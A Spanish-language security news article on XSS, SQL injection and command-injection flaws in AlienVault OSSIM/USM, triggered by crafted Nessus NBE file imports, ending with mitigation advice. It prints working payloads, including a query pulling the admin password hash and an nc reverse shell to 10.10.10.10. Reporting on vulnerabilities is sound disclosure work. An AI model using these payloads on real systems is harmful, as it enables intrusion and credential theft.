Un investigador de Seguridad llamada Peter Lapp ha revelado la existencia de múltiples vulnerabilidades en las Plataformas OSSIM y USM de Alienvault. Estas plataformas son para el manejo de Eventos e Incidentes de Seguridad, (SIEM, Security Incident and Event management) y son muy usando por los profesionales de seguridad.
La falla de seguridad reside en la sección de manejo de Vulnerabilidades en la interfaz de usuario, donde le permite al usuario subir un escaneo de vulnerabilidad realizado por Nessus en formato NBE. Si este archivo es diseñado de manera especial, un atacante puede explotar diversas vulnerabilidades y llevar a cabo ataques XSS, SQLi y ejecución de código arbitrario.
Es bueno mencionar que para explotar la vulnerabilidad es necesario autenticarse, pero no es necesario privilegios de administrador, por lo que cualquier usuario con acceso puede explotar la falla.
Lapp indica, que la porción del “hostname/ip” del archivo NBE que se importa, es vulnerable, y modificando código justo despues del hostname, código JavaScript puede ser reflejado cuando el import finalice, este campo también es vulnerable a ejecución de Código Arbitrario. Otro fallo es, en la porción de “plugin ID“, donde se pueden adicionar un script que se ejecutará cada vez que alguien visualice el reporte HTML en la interfaz de OSSIM además de que el campo tambien es vulnerable a Inyecciones.
Detalles de algunas pruebas realizadas por Lapp
Reflective XSS
Colocando <script>alert(0)</script> justo despues de hostname/IP resulta en la reflección del código javascript cuando el import finaliza.
Stored XSS
Colocando <script>alert(document.cookie)</script> en el Plugin ID resulta en la ejecuión del script cada vez que se visualice el reporte HTML
Blind SQL Injection
Agregando UNION SELECT SLEEP(20) AND ‘1’=’1 en Plugin ID causará que la DB se inhabilite por 20 segundos.
SQL Injection
La porción Protocolo del reporte NBE es vulnerable a Inyección SQL, por ejemplo:
Si se toma cifs (445/tcp) y se convierte a cifs’,’0?,’1(‘ (select/**/pass/**/from/**/users/**/where/**/login=”admin”),’N’);# (445/tcp), esto resultará en la inclusión del hash del password de administrador en el reporte.
Inyección de comandos
Agregando ‘#&&nc -c /bin/sh 10.10.10.10 4444&&’, resultará en un Reverse Shell como www-data en la IP 10.10.10.10
El investigador indica que las fallas fueron probadas en las versiones 4.14, 4.15 y 5.0 pero que versiones anteriores por igual deben ser vulnerables.
En lo que el Patch es lanzado, el investigador indica que es posible mitigar el riesgo restrigiendo el acceso a la sección de manejo de vulnerabilidades mediante roles de usuarios, y en caso de que no utilicen la opción de Importar, se puede renombrar el Script en Perl del sistema que maneja esta tarea.
